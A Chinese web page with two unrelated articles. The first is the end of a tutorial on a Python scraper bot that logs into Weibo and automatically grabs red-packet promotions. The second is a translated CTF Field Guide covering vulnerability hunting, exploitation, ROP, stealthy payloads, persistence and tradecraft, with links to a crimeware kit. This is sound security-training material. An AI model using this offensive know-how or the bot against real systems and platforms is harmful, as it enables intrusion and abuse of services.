                'mostsenddaka':'http://huodong.weibo.com/hongbao/top_mostsenddaka',
                'mostsendpartner':'http://huodong.weibo.com/hongbao/top_mostsendpartner',
                'cate':'http://huodong.weibo.com/hongbao/cate?type=',
                'clothes':'http://huodong.weibo.com/hongbao/cate?type=clothes',
                'beauty':'http://huodong.weibo.com/hongbao/cate?type=beauty',
                'fast':'http://huodong.weibo.com/hongbao/cate?type=fast',
                'life':'http://huodong.weibo.com/hongbao/cate?type=life',
                'digital':'http://huodong.weibo.com/hongbao/cate?type=digital',
                'other':'http://huodong.weibo.com/hongbao/cate?type=other'
                }

        for (theme,url) in themeUrl.items():
                print "----------"+theme+"----------"
                print  url
                print  "----------......----------"
                getThemeList(url,1)

        for (top,url) in topUrl.items():
                print "----------"+top+"----------"
                print  url
                print  "----------......----------"
                getTopList(url,0,1) 
                getTopList(url,1,1)

0x05 判断红包可用性

这个是比较简单的，首先在源码里搜一下关键字看看有没有抢红包按钮，然后再到领取排行里面看看最高纪录是多少，要是最多的才领那么几块钱的话就再见吧……

其中查看领取记录的地址为http://huodong.weibo.com/aj_hongbao/detailmore?page=1&type=2&_t=0&__rnd=1423744829265&uid=红包id

def checkValue(id):
        infoUrl='http://huodong.weibo.com/hongbao/'+str(id)
        html=getData(infoUrl)

        if 'action-type="lottery"' in  html or True: #存在抢红包按钮
                logUrl="http://huodong.weibo.com/aj_hongbao/detailmore?page=1&type=2&_t=0&__rnd=1423744829265&uid="+id #查看排行榜数据
                param={}
                header= {
                        'Cache-Control':'no-cache',
                        'Content-Type':'application/x-www-form-urlencoded',
                        'Pragma':'no-cache',
                        'Referer':'http://huodong.weibo.com/hongbao/detail?uid='+str(id),
                        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 BIDUBrowser/6.x Safari/537.36',
                        'X-Requested-With':'XMLHttpRequest'
                        }
                res = postData(logUrl,param,header)
                pMoney=re.compile(r'<span class="money">(\d+?.+?)\xd4\xaa</span>',re.DOTALL) #h获取所有list_info的正则
                luckyLog=pMoney.findall(html,re.DOTALL)

                if len(luckyLog)==0:
                        maxMoney=0
                else:
                        maxMoney=float(luckyLog[0])

                if maxMoney<lowest: #记录中最大红包小于设定值
                        return False
        else:
                print u"---------手慢一步---------"
                print  "----------......----------"
                return False
        return True

0x06 收尾工作

主要的模块都已经搞定，现在需要将所有的步骤串联起来：

def start(username,password,low,fromFile):
        gl=False
        lowest=low
        login(username , password)
        if fromfile=='y':
                if os.path.exists('luckyList.txt'):
                        try:
                                f = file('luckyList.txt')
                                newList = []  
                                newList = p.load(f)
                                print u'---------装载列表---------'
                                print  "----------......----------"
                        except Exception, e:
                                print u'解析本地列表失败，抓取在线页面。'
                                print  "----------......----------"
                                gl=True
                else:
                        print u'本地不存在luckyList.txt，抓取在线页面。'
                        print  "----------......----------"
                        gl=True
        if gl==True:
                getList()
                from operator import itemgetter
                newList=sorted(luckyList, key=itemgetter(4),reverse=True)
                f = file('luckyList.txt', 'w')  
                p.dump(newList, f) #把抓到的列表存到文件里，下次就不用再抓了
                f.close() 

        for lucky in newList:
                if not 'http://huodong.weibo.com' in lucky[3]: #不是红包
                        continue
                print lucky[3]
                id=re.findall(r'(\w*[0-9]+)\w*',lucky[3])
                getLucky(id[0])

因为每次测试的时候都要重复爬取红包列表，很麻烦，所以加了段将完整列表dump到文件的代码，这样以后就可以读本地列表然后抢红包了，构造完start模块后，写一个入口程序把微博账号传过去就OK了：

if __name__ == "__main__":  
        print u"------------------微博红包助手------------------"
        print  "---------------------v0.0.1---------------------"
        print  u"-------------by @无所不能的魂大人----------------"
        print  "-------------------------------------------------"

        try:
                uname=raw_input(u"请输入微博账号: ".decode('utf-8').encode('gbk'))
                pwd=raw_input(u"请输入微博密码: ".decode('utf-8').encode('gbk'))
                low=int(raw_input(u"红包领取最高现金大于n时参与: ".decode('utf-8').encode('gbk')))
                fromfile=raw_input(u"是否使用luckyList.txt中红包列表:(y/n) ".decode('utf-8').encode('gbk'))
        except Exception, e:
                print u"参数错误"
                print  "----------......----------"
                print e
                exit(0)

        print u"---------程序开始---------"
        print  "----------......----------"
        start(uname,pwd,low,fromfile)
        print u"---------程序结束---------"
        print  "----------......----------"
        os.system('pause')

0x07 走你！

0x07 总结

基本的爬虫骨架已经基本可以完成了，其实这个爬虫的很多细节上还是有很大发挥空间的，比如改装成支持批量登录的，比如优化下红包价值算法，代码本身应该也有很多地方可以优化的，不过以我的能力估计也就能搞到这了。

最后程序的结果大家都看到了，我写了几百行代码，几千字的文章，辛辛苦苦换来的只是一组双色球，尼玛坑爹啊，怎么会是双色球呢！！！（旁白：作者越说越激动，居然哭了起来，周围人纷纷劝说：兄弟，不至于的，不就是个微博红包么，昨天手都撸酸了也没摇出个微信红包。）唉，其实我不是哭这个，我难过的是我已经二十多岁了，还在做写程序抓微博红包这么无聊的事情，这根本不是我想要的人生啊！

源码下载：weibo_hb.rar

（全文完）

原文：https://trailofbits.github.io/ctf/

翻译：做个好人

译者声明：本文翻译自美国trailofbits团队发布在Github上的《CTF Field Guide》手册，我们已与对方联系获得翻译授权，由于手册内容尚在更新过程中，故有部分缺失。如有翻译不当之处，请与我们联系更正：@IDF实验室。

“Knowing is not enough; we must apply. Willing is not enough; we must do.” （仅仅知道还不够，我们必须付诸实践。仅有意愿还不够，我们必须付诸行动。）

—— Johann Wolfgang von Goethe

欢迎！

很高兴你能来到这里，我们需要更多的像你这样的人。

如果你想拥有一种能够自我防卫的生活，那就必须像攻击者那样思考。

所以，学学如何在夺旗比赛（CTF）中赢得比赛吧，这种比赛将专业的计算机安全活动规则进行了浓缩，且具有可客观评判的挑战题。CTF比赛趋向关注的主要领域是漏洞挖掘、漏洞利用程序构建、工具箱构建和可实施的谍报技术（tradecraft）。

无论你想赢得CTF比赛，还是想成为一名计算机安全专家，都至少需要擅长这些方面中的其中之一，理想情况下需要擅长所有这些领域。

这就是我们编写此手册的目的。

在这些章节中，你会找到赢得下一次CTF比赛的一切要素：

• 以往CTF挑战赛的题目的查看和研究；

• 帮助你设计和构建属于自己工具集的引导；

• 包括现实世界中的和以往CTF比赛中的攻击者行为案例研究；

为了让你更好过一些，我们在每节课程中补充了互联网上最好的配套参考资料，这些资料来自于一些计算机安全领域最好的人员之手。更进一步，我们希望你能够将此手册与实际工作结合起来使用。

我们编写该手册是为了帮助你能够尽可能地快速学习，如果在学习过程中有任何问题，请与我们联系，我们将把你的问题转达给最合适的专家。如果有足够的需要，我们甚至可以安排一节线上课程。

现在，让我们开始吧。

一、夺旗比赛

为什么选择CTF？

计算机安全因其跨领域的特性在人才教育方面提出了一个挑战。计算机安全的课题领域的分布从计算机科学理论方面到信息技术管理方面的应用，这样很难简短概括计算机安全专业的灵魂是什么。

评估这种专业性的一种近似方法已经出现：“夺旗”比赛。攻击为导向的CTF比赛尝试将专业计算机安全工作许多方面的本质浓缩为可客观评估的简短挑战题目。CTF比赛趋向于关注的领域包括漏洞挖掘、漏洞利用程序构建、工具箱构建和可实施的谍报技术（tradecraft）。

一个现代的计算机安全专家应该至少其中一个领域的专家，理想情况下应该擅长所有这些内容。在CTF比赛中赢得胜利要求参赛选手在所有这些领域中至少是其中一方面的专家。所以，准备和参与CTF比赛是一种有效将计算机科学的离散面聚合、聚焦于计算机安全领域的方法。

1.1、找一场CTF

如果曾经你想开始练习跑步，那么可能你是将5000米作为一个目标。同样的原则在这里也适用：选择一个在不久之后你想要参加的一场CTF比赛，并设定一个练习计划。下面是我们推荐的一些CTF比赛：

• CMU主办的PicoCTF和PlaidCTF

• 针对高校学生的HSCTF

• Ghost in the Shellcode（Gits）

• NYU-Poly主办的CSAW CTF

• 只针对学院派的UCSB iCTF

• Defcon CTF

访问CTF Time和CapCTF calendar可以看到一年中每个星期都在发生的更多、更全的CTF比赛。

Wargame有什么不同？

除了持续进行之外，Wargame和CTF很相似。典型的情况是，Wargame题目被组织为许多级别，并随着被解决题目的增多而逐渐变难。Wargame是为CTF进行练习的绝佳方式！以下是我们最喜欢的一些Wargame站点：

• Micro Corruption

• SmashTheStack

• OverTheWire

• Exploit Exercises

CCDC怎么样？

有一些仅做防御的比赛也将自己看作是CTF比赛，主要是高校网络防御挑战赛（CCDC，Collegiate Cyber Defense Challenge）及其地区比赛，我们的建议是你应该无视这些比赛。无奈的是它们的题目都是不切实际的题目，很少会教授你和安全相关的内容。虽然他们乐此不疲的将自己作为红队（Red Team）看待！

1.2、找一份工作

职业列表

[编辑注：这是为pentest.cryptocity.net编写的一篇较老的文章，我们正在更新过程中。]

以下这些是基于我已有的经验和你情况的不同而写的对于信息安全职业生涯的看法。如果你住在纽约市，而且对于应用安全、渗透测试或逆向工程感兴趣，刚刚踏入信息安全领域开始你的职业生涯，那么以下信息会对你非常适合。

1. 雇主

2. 角色

3. 书本中学习

4. 课程中学习

5. 大学

6. CTF比赛

7. 沟通

8. 见人

9. 会议

10. 认证

11. 链接

12. 指引的朋友

​雇主

就我可讲的而言，在信息安全产业有五类主要的雇主（不计学院派）。

• 政府

• 非技术型财富500强（大多数是金融类）

• 大型技术供应商（大多数是在西海岸）

• 大型咨询公司（大多数非技术企业）

• 小型咨询公司（大多数很酷）

你所工作的产业决定了你需要解决的主要问题。例如，金融行业重点强调的是对于商业过程将风险降低到最低损失（大规模自动化的原因）。另一方面，咨询常常意味着向人们销售想法X，X实际上就是一个漏洞或研究发现新的漏洞。

角色

我主要将信息安全职位分离对应到互联网网络安全、产品安全和咨询。进一步我将这些类型的工作分类为以下几个角色：

• 应用安全（代码审计/应用评估）

• 攻击者（攻击）

• 合规性

• 电子取证

• 事件处理

• 管理者

• 网络安全工程师

• 渗透测试

• 政策/策略

• 研究员

• 逆向工程师

• 安全架构师

​以上的每一个角色都要求有不同的、高专业性的知识面。这个站点对于应用安全和渗透测试是一个不错的资源，但是如果你对其他角色感兴趣就需要找其他资源。

书本中学习

幸运的是，关于每个信息安全方面的主题都有一打好书。Dino Dai Zovi和Tom Ptacek都有绝佳的读书列表。我们建议阅读以下图书：

• Gray Hat Hacking

• The Myths of Security

• Hacking: The Next Generation

• O'Reilly出版的任何一本你选择的脚本语言书

如果你不知道自己在找什么书，那么可以访问O'Reilly提供的书单。他们可能是这个产业中最执着和最高质的图书出版商了。

别忘了，单纯的读书不会给予你超越谈资之外的任何附加技能，你需要练习或基于你从书本中实际学到和理解的内容创造一些东西。

课程中学习

如果你在找一些可以随手拿来和直接了当的东西，那么有许多在线的大学课程是关于信息安全的。我在下方列出了一些绝佳的课程资源（根据机构名称排序）。RPI课程是和这些课程最相似的一个，Hovav可以通过最佳学术阅读列表的内容获得绩点，但是列表中的每个课程都很出色。

[编辑注：表格待添加/之后更新。]

大学

找到一所有专业安全课程大学的最容易和简单的办法是通过NSA Centers of Academic Execllence（NSA-COE）机构列表。这个资质要求正逐渐放低以至于越来越多的大学已经获得此资质，它也可以帮助你寻找那些刚刚获得COE-CO资质的单位。记住，资质仅供参考。你需要深入了解每所大学实际的课程，而不是仅依靠资质做选择。

一旦进入大学，要上那些能够强迫你编写大量代码解决难题的课程。IMHO的课程聚焦于理论或提供有限价值的模拟问题。如果你无法从整个CS课程表中确定哪些是有编程内容的CS课程，那么就向学长征求意见。另一种达成此项目的的方式是报考学校的软件开发专业而不是计算机科学专业。

夺旗比赛

如果你想获得和学到技能技巧，且想要做地更快，那么应该参加CTF比赛或一头扎进Wargame。值得注意的一点是许多这种挑战赛都有附加的会议（各种规模），参加这些比赛就意味着会错过整个会议。试着不要赛过头，因为参加会议有参加会议的好处（见下文）。

有一些仅做防御的比赛也将自己定位为CTF比赛，主要是高校网络防御挑战赛（CCDC）及其地区比赛，我的建议是无视它们。他们的题目是关于系统管理，很少会教你安全相关的内容。尽管他们乐此不疲地将自己看作是红队（Red Team）。

沟通

在任何角色中，你的时间都主要花费在与其他人的沟通上，主要通过Email和会议，少量是通过电话和即时通讯（IM）。雇主的角色决定了你是否需要和内部安全团队、非安全技术人员或商业用户接触更多。例如，如果你在金融公司做网络安全工作，那么就需要和内部技术人员沟通更多。

在大型组织中做好沟通的建议：

• 学习写简洁、明了、专业的邮件。

• 学习让事情有组织地被解决。不要随心所欲。

• 学习公司或客户的商业内容。如果你从商业层面考虑，你的选择就有a）不做任何事 b）解决事情 和c）考虑时间和成本更有说服力做事。

• 学习你所在公司或客户是怎样工作的，比如关键人物、过程或其他能够让事情达成的激励因素。

​如果你仍然在学校学习CS课程，参加人文类课程会强迫你写东西。

见人

找到并参加你所在城市的安全聚会（CitySec），在大多数城市每个月都会有一次没有演讲的非正式会面。顺道提一句，我们参加的是我们本地的NYSEC。

ISSA和ISC2关注于政策、合规性和其他新兴且不确定的话题。类似的，InfraGard主要关注在非技术性法律执行方面的话题。OWASP是由厂商发起形成的活动中最糟糕的例子，与其说它是和技术相关，不如说是和销售相关。

会议

如果你此前从来没参加过信息安全会议，使用下面的Google日历可以帮你找到一个低消费的本地会议。我的学生中有人认为参加一场会议是某种测验，所以尽可能地推脱不去。我保证我不会带着期末测验从灌木丛中跳出来，并在事后扣你的分数。

• 信息安全会议日历

如果你参加一场会议，不要太看重每个时间段的会谈。会谈只是吸引所有聪明的黑客在某个周末聚集到一个角落的诱饵：你应该见见其他与会者！如果一个特别的会谈非常有意思和有用，那么你应该和演讲者进行互动。关于这个主题，Shawn Moyer在Defcon嘉宾角的这篇文章中有更多描述。

如果你在某个地方工作，并焦虑着如何向公司交代出席会议的事情，那么Infosec Leaders blog中有一些有用的建议。

认证

这个产业需要特别的知识和技巧，为了认证考试而学习不会对你的知识和技能有任何帮助。事实上，在很多情况下它还有坏处，因为你花费时间学习认证考试而导致你分心无法做该手册中提到的事情。

即便如此，有一些便宜的和中立厂商的认证可以在你当前阶段帮助你突出你的简历，例如Network+和Security+或者甚至一个NOP，但是我认为认证在你找工作或专业发展中起不到什么作用。

通常，有两种原因需要获得认证：

• 你已经支付认证的费用，通过支付培训和考试或有时候在你获得认证之后会自动支付费用（通常是政府认证）。

• 你的公司或你的客户强迫你获得认证。这通常有助于销售增长，比如“你应该选择我们，因为我们所有的员工都有XYZ认证！”

通常，花费时间在参加CTF上更加有产出效率，然后用你的最终排名来证明你的能力。

链接

• 关于该文章的Reddit和Hacker News子内容

• 安全建议

1. How to Break Into Security, Ptacek Edition

2. VRT: How to Become an Infosec Expert, Part I

3. Five pieces of advice for those new to the infosec industry

4. How to Milk a Computer Science Education for Offensive Security Skills

5. Kill Your Idols, Shawn Moyer's reflections on his first years at Defcon

• ​认证有感

1. ​My Canons of (ISC)2 Ethics

2. Not a CISSP

3. (ISC)2's Newest Cash Cow

4. Why You Should Not Get a CISSP

• 常规技术建议

1. ​Advice for Computer Science College Students

2. Don't call yourself a programmer, and other career advice

3. The answer to "Will you mentor me?" is .... no.

二、漏洞挖掘

2.1、源代码审计

这个部分是关于熟悉应用程序编译为本地代码时显现的漏洞。对一门编译语言编写应用程序时的精准和完整理解，在没有学习编译器怎样转换源代码为机器语言和处理器怎么执行代码前是无法达到的。一种简单的获得这些转换经验的方式是通过逆向工程你自己的代码或源码可见的项目。在这个部分结束时你将会识别用诸如C和C++编译语言编写的常见漏洞。

大型软件包由于使用第三方软件库导致漏洞普遍存在。常见的例子包括像libxml、libpng、libpoppler和用来解析已编译文件格式和协议的libfreetype等这样的库。这些库中的每一个都曾在历史上被发现过易于攻击的漏洞。即便当新的版本发布之后，也无助于绝大多数软件的未更新，在这些情况下很容易发现易于发现的已知漏洞。

课程

• Source Code Auditing I

• Source Code Auditing II

挑战工坊

为了锻炼你的技能，我们建议通过一个故意留有漏洞的程序过一遍尽可能多漏洞发掘之旅，然后转移到实际应用中做同样的事情。

Newspaper应用是一个用C语言编写的小型服务应用，允许认证的用户读取和写入文章到一个远程文件系统。Newspaper编写的方式使得它对于许多不同的攻击都有漏洞可以利用。你应该能够通过源码发现其中至少10个bug或可能存在的漏洞。

• Newspaper App

• Newspaper App Installer

​Wireshark，无论怎样，是一款从1998年开始持续开发的行业标准级别的网络协议分析器。相比漏洞诸多的Newspaper应用，Wireshark的漏洞少之又少。查看wireshark安全页面，找到一个协议解析器的名字并测试是否你可以在没有查看漏洞细节的情况下发现漏洞。解析器位于/epan/dissectors/目录。

• Wiireesakk 1.8.5

​工具

当进行源码审计时，使用一款用户分析和引导代码库的工具是很有帮助的。下面是两款工具，Source Navigator和Understand，通过收集和展现相关数据关系、API使用、设计模式和控制流的信息来帮助分析员快速熟悉代码。一个有用的对比工具的例子同样列在下方。其中一个免费、开源的审计工具例子是Clang Static Analyzer，该工具可以帮助你在常见API和漏洞编码形式中跟踪编程错误。

• Source Navigator
• Scitools Understand
• Meld
• Clang Static Analyzer

​资源

要确定你对分析目标所用的编程语言非常地熟悉。发现漏洞的审计员相比初始开发软件的程序员要更加熟悉语言和代码库。在一些案例中，这种级别的理解可以简单通过关注可选编译器警告或通过第三方分析工具帮助跟踪常见编程错误而达到。计算机安全等同于计算机精通。对你的目标没有严苛的理解，也就没有抵御攻击的希望。

• Essential C——C语言编程入门

• TAOSSA Chapter 6: C Language Issues——强烈推荐阅读

• Integer Overflow

• Wireshark Security——许多漏洞的例子

• Gera's Insecure Programming by Example——小型漏洞C程序的例子

​2.2、二进制审计

现在你已经深入到原生层，这是你撕扯下所有遮掩后的软件。今天我们所关注的原生代码形式是Intel X86下的32位代码。Intel处理器从上世纪80年代开始在个人计算机市场有着强劲的表现，现在支配着桌面和服务器市场。理解这些指令集可以帮助你以内部视角看到程序每天是如何运行的，也可以在你遇到诸如ARM、MIPS、PowerPC和SPARC等其他指令集时提供一种参考。

这部分内容我们将要逐渐熟悉原生层和开发策略，以理解、分析和解释本地代码。在该部分结束时你应该能够完成一项“逆向编译”——从汇编分段到高级语言状态——以及处理过程、派生意义和程序员意图。

课程

学习X86初看起来令人生畏且需要一些专业性的学习才能掌握。我们建议阅读《深入理解计算机系统》的第三章学习C程序是怎样编译成机器指令的。当你有了一些基础的、这种过程的应用知识，就在手边随时备着像弗吉尼亚大学x86汇编指南这样的参考指南。我们还发现了来自Quinn Liu的系列视频作为快速介绍。

• 《深入理解计算机系统》第三章: Machine-Level Representation of Programs

• x86 Assembly Guide

• Introduction to x86 Assembly

​挑战工坊

下面的程序都是“二进制炸弹”。逆向工程这些Linux程序并确定输入序列就可以“拆除“炸弹。炸弹的每个连接层关注于原生代码的不同层面。例如，CMU实验室中的程序（CMU Binary Bomb Lab）中你会看到不同数据结构（链表、树）以及控制流结构（切换、循环）在原生代码层面怎样表现的。在逆向这些程序时你可以发现将程序执行流程转换为C或者其他高级语言的有用之处。

你应该将目标聚焦于解决这两个实验室程序的八个段。CMU炸弹程序有一个隐藏段，RPI炸弹程序有一个段包含有内存错误，你能找到并解决么？

• CMU Binary Bomb Lab

• RPI Binary Bomb Lab

​工具

处理原生代码的两个至关重要的工具是调试器和反汇编器。我们建议你熟悉下行业标准反汇编工具：IDA Pro。IDA会分割代码为独立的块以对应程序源码的定义函数。每个函数进一步被分割为修改控制流的指令定义的“基础块”。这样很容易一眼识别循环、条件和其他控制流指令。

调试器允许你与设置了断点的运行中代码进行交互和状态检查，以及内存检查和寄存器内容查看。你会发现如果你的输入没有产生预期的结果，这些查看功能是很有用的，但是一些程序会使用反调试技术在调试时改变程序行为。对于大多数Linux系统来说GNU调试器（gdb）是标准的调试工具。gdb可以通过你所用Linux版本的软件包管理器获得。

• IDA Pro Demo

• gdb

​资源

已经有许多好的资源用来学习x86汇编和CTF题目中的技巧。除了以上资源，x86维基手册和AMD指令集帮助都是更加完整的参考供你参考（我们发现AMD帮助手册没有Intel帮助手册那么吓人）。

• AMD64程序员帮助手册: General-Purpose and System Instructions

• x86 Assembly Wikibook

• Computer Systems: A Programmer's Perspective (《深入理解计算机系统》)

​一些逆向工程工具使用起来和汇编语言自身一样复杂。下面列出的是常用的命令行工具的命令表单：

• gdb Quick Reference

• IDA Quick Reference

• WinDBG x86 Cheat Sheet

最后，许多CTF挑战会使用反调试技术和反汇编技术隐藏或混淆目标。上面的炸弹程序就使用了其中的几种技术，但是你可能想要更全面的参考资料。

• Linux anti-debugging techniques

• The "Ultimate" Anti-Debugging Reference

​2.3、Web应用审计

欢迎来到Web渗透部分，在这个部分中将会熟悉Web应用中发现的常见漏洞。在该部分结束时你应该能够使用各种测试方法和源码级别审计识别基于Web的常见应用漏洞。课程资源中将会给出对挑战工坊资源进行成功审计的所有工具。

课程

• Web Hacking Part I

• Web Hacking Part II

挑战工坊

为了锻炼你的技能，我们建议你实践一遍Damn Vulnerable Web App（DVWA）和Sibria Exploit Kit的漏洞发掘与利用。DVWA是基于PHP并汇总了各类漏洞的一套测试环境，在其中能够看到Web应用中许多常见的错误。Siberia Exploit Kit是一个被许多犯罪份子用来完成大量攻击的“犯罪套件”，它包括了一个浏览器利用包和一个用来管理受害主机的控制面板。Siberia包含的几种基于POST的身份认证漏洞允许攻击者获得管理员权限并接管服务器所在的主机。

下载并在VMware虚拟机中运行OWASP Broken Web Apps开始此次挑战工坊。BWA包含许多用来安全测试的Web应用，其中包括DVWA。如果你搞定了DVWA，那么放轻松再试试其他Web应用漏洞！尝试审计Siberia的源码来找寻漏洞，要将注意力集中在PHP输入的代码上。

• OWASP Broken Web Apps

• Siberia Crimeware Pack (口令: infected)

​工具

Burp Suite是一个用来安全测试的本地HTTP代理。Burp Suite是针对Web渗透测试人员开发的，并将许多常见功能集成在一个GUI界面中。免费版本的可用功能足以完成上面的挑战和许多其他Web安全挑战。

• Burp Suite

​资源

许多简单的测试方法和常见的Web应用漏洞都可以在该部分的挑战题中遇到。在做这些挑战题前请先确定你理解了HTTP、HTML和PHP的基础知识。

• OWASP Top 10 Tools and Tactics

• The Tangled Web: Chapter 3

• PHP Primer

​三、漏洞利用程序的构建

3.1、二进制的漏洞利用（1）

二进制的漏洞利用是破坏编译程序的过程，令程序违反自身的可信边界从而有利于你——攻击者。本部分中我们将聚焦于内存错误。通过利用漏洞来制造软件内存错误，我们可以用某种方式重写恶意程序静态数据，从而提升特定程序的权限（像远程桌面服务器）或通过劫持控制流完成任意操作和运行我们所用的代码。

如果你尝试在已编译的C程序中找bug，知晓你要找的东西是很重要的。从认识你发送的数据被程序用在什么地方开始，如果你的数据被存储在一个缓冲区中，要注意到它们的大小。编写没有错误的C程序是非常难的，CERT C Coding Standard手册汇总了许多错误出现的方式。对commonly misused APIs稍加注意是可以加快了解的捷径。

一旦一个漏洞被确认，它就可以被用来威胁程序的完整性，然而，有各种不同的方式可以达到这个目标。对于像Web服务器这样的程序，获取另一个用户的信息可能是最终目标。另一方面，修改你的权限可能是有用的，比如修改一个本地用户权限为管理员。

课程

第一套课程是《Memory Corruption 101》，提供了Windows环境下缓冲区溢出利用一步一步的解释和相关背景。第二套课程《Memory Corruption 102》，涵盖了更多高级主题，包括Web浏览器漏洞利用。这两套课程都是针对Windows的例子，但技术和过程可以用于使用x86指令集的其他操作系统。记住，当你处理UNIX/Linux二进制时，函数名称和有时候的调用约定是不一样的。

• Memory Corruption 101

• Memory Corruption 102

​工具

我们建议使用GDB来调试该部分的挑战题，因为它们都是在32位Linux下编译的，然而，GDB更适合用来调试源代码，而不是没有标识符和调试信息的纯粹二进制程序。诸如gdbinit、peda和voltron可以使gdb在调试无源码的程序时更有用。我们建议在你的home目录下创建一个至少包含以下命令的.gdbinit文件：

set disassembly-flavor intel

set follow-fork-mode child

挑战工坊

为了运行这些挑战题，你需要安装Ubuntu 14.01（32-bit）虚拟机。我们建议使用VMware Player，因为它免费且支持性很好。在你运行虚拟机后，打开终端并运行sudo apt-get install socat来安装socat。

在此次挑战工坊中共有三道挑战题，当你在git中clone该手册的repository后，每道题都包含在其目录中，每道题的最终目标是操纵执行流以读取flag。对于每道题，请尝试将反汇编转换为C代码。在尝试之后，你可以通过查看提供的实际C源码来确认你的猜测，然后，尝试利用漏洞来读取flag。

挑战题：Easy

确认目录中easy程序的flag。当你执行easy后，它会在12346端口监听指令。

挑战题：Social

和easy类似，确认目录中social程序的flag和作为social程序的host.sh。当你执行social后，它将在12347端口监听指令。

资源

• Using GDB to Develop Exploits - A Basic Run Through

• Exploiting Format String Vulnerabilities

• Low-level Software Security: Attacks and Defenses

3.2、二进制的漏洞利用（2）

在该部分内容中，我们继续可利用漏洞的本地应用检查之路，并关注使用返回导向编程（ROP）来达到此目的。ROP是在代码结尾的返回指令中整合现有可执行片段的过程。通过创建这些“玩意儿”地址链可以在不引入任何新代码的情况下写新程序。

记住，在可利用程序的漏洞识别方法上你需要灵活应变。有时候有必要在漏洞利用开发过程中对一个漏洞多次利用。有时，你可能仅想用ROP来让你的shellcode执行，其他情况下，你可能想在ROP中完整写一个攻击载荷。偶尔，内存布局能使非常规的漏洞利用方法可行，例如，你可曾考虑过用ROP来构造一个不受控的格式化字符串漏洞？

课程

本部分的课程将讨论返回导向编程（ROP）和绕过数据不可执行保护的代码重用。这些在漏洞利用细节上会更具体，且基于上部分所讨论的内容。

• Return Oriented Exploitation

• Payload already inside data re-use for ROP exploits（特指Linux）

​挑战工坊

和前一个部分的挑战一样，在你clone repository后文件夹中有两个可执行文件。每个程序的漏洞利用都需要使用返回导向编程以读取flag。此次的挑战题没有提供源代码的访问。你需要对二进制程序进行逆向工程来发掘漏洞，并需要将漏洞利用的技术。同样，请使用相同的Ubuntu 14.04（32-bit）虚拟机。

挑战题：brute_cookie

运行bc程序，它会监听12345端口。

挑战题：space

运行作为space程序的host.sh，它会监听12348端口。

挑战题：rop_mixer

运行作为rop_mixer程序的host.sh，它会监听12349端口。

工具

参考前面所提到的工具。如果你还没有准备，你需要熟悉一下*NIX的binutils套件。像readelf、strings、objdump、objcopy和nm都是常用的有用工具。请使用软件包管理器和帮助页面安装和阅读它们的使用。

有几个现有的工具专门用来创建可重用代码的漏洞，它们比一般的反汇编器更加专业，因为它们会寻找合适的可执行代码段作为ROP目标（在指令、.rodata等中）。

• RP

• ROPGadget

• BISC——适用于课程的简单工具

资源

• x86-64 buffer overflow exploits and the borrowed code chunks exploitation technique

• Surgically returning to randomized lib(c)

• Extensive security reference

• Dartmouth College: Useful Security and Privacy links

• Corelan Team Blog

3.3、Web应用的漏洞利用

该部分承接前面的Web应用审计部分。在该部分中我们将关注于漏洞的利用，在结束时你应该能够熟练地识别和利用OWASP Top 10。

课程

前面的内容中我们已经介绍了Web安全的基础部分，所以现在在该部分中我们可以更深一步到一些能够获得更大效果的合适工具。学习掌握Burp Suite和Chrome开发者工具能够更好的理解和你交互的应用程序。BeEF是一个XSS代理的例子，通读它的源码学习它怎样工作将会受益匪浅。

• Burp Suite Training

• Chrome Dev Tools

• From XSS to reverse shell with BeEF

​挑战工坊

你被指派对一个小而糙的Web应用程序Gruyere进行审计。Gruyere是托管于Google的应用，它能够进行许多类型的Web方面漏洞利用练习，包括XSS、SQL注入、CSRF、路径穿越和其他。对于每一个挑战你都能够找到提示、漏洞和进行漏洞修复的方法。

参考

• Google Chrome Console

• OWASP Top 10 Tools and Tactics

• The Tangled Web: Chapter 3

• PHP Primer

​工具

SQLMap和BeEF都是强大且有趣的工具，但是对于挑战题基本上用不着。如果你坚持要使用BeEF，请不要尝试拦截进行应用审计的其他用户。

• Burp Suite

• SQL Map

• The Browser Exploitation Framework (BeEF)

四、电子取证

[译者注：暂无]

五、工具箱的构建

5.1、工具箱的准备

欢迎来到工具箱构建部分。工具箱就是能够让你和你的团队以最有效的方式达成目标的工具集合。工具箱是一个有强有力的效率工具，能够让你在比赛期间花费最短的时间开发漏洞利用并得到最大化的开发回报。

一个好的工具箱是好用且易用的。你应该将能够让团队有效沟通、协同工作、自动化的常用工具和提供比赛情况的软件包含进来。

课程

• Creating a SOC

• Stealth Rootkit Development

• Toolsmithing Case Study

• Organizing and Participating in CTF

• RTFn

​挑战工坊

创建三个列表。第一个列表用你理想化的功能型工具构成；第二个列表用能够提供你所需要的功能的软件构成；第三个列表从前两个列表中按照功能重要性和支持性进行排序。最后开发那些能够弥补你理想化工具和现有工具不足的软件。

下面是一些你不能忽视的功能：

• 漏洞利用、密钥聚集和提交管理

• 隐秘和安全的载荷或持续驻留方法

• 安全通讯和协同

• 网络/主机环境监测

​资源

• Meterpreter Functionality Outline

• IDA Python Overview, IDA Python Download

• NASM Documentation

• Pyershark

• 从Pwnies（Python）和Ronin（Ruby）你可能会找到有用的代码

六、可实施的谍报技术

6.1、案例研究

可实施的谍报技术通常是持续对一个特定目标的挖掘。在进行比赛性的Wargame时你将会几乎将所有经历集中在规避检测并不暴露你的工具集（基础工具、漏洞利用）的风险。

课程

• Post-Exploitation and Operational Security

• A Brief History of CTF and Tradecraft

• Operational Use of Offensive Cyber

挑战工坊

• 评价下面活动中所展现的可实施谍报技术。每个计划都决定了要使用的工具和活动背后的可操作性侧露。

• 在评价谍报技术过程中思考以下一些问题：

• 为什么行动者选择完成/实现X行动/能力？

• 哪里有失误？漏洞的选择还是某种形式的短视？

• 行动/能力有不恰当么？能否弥补可操作性策略的不足？

• 行动者对保护什么最有兴趣？（比如：工具、特征、雇主等等）

• 从攻击者角度每个活动中能学到什么？防御者角度呢？

活动

• APT1

• StuxNet

• Careto

​资源

这些是少数公开的关于他们自己谍报技术的例子、团队或组织。下面的提供的AMA是对格外天才的团队怎样行动的惊鸿一瞥。

• Plaid Parlement Of Pwning AMA

• Samurai AMA

• Tradecraft Lectures 8 & 9

七、参与者

该手册的编写建立在许多艰难工作之上，绝大多数难点是在其他地方。未经允许不得重新发布这些文件，因为该手册尚在更新过程中，我们非常感谢和感激大家的支持。

所以，读者们，当你完成一些CTF比赛准备参加更多的比赛，请参与到该手册的编写中来。那些有着雄心壮志的人们或许知道一些需要如此技能的人。

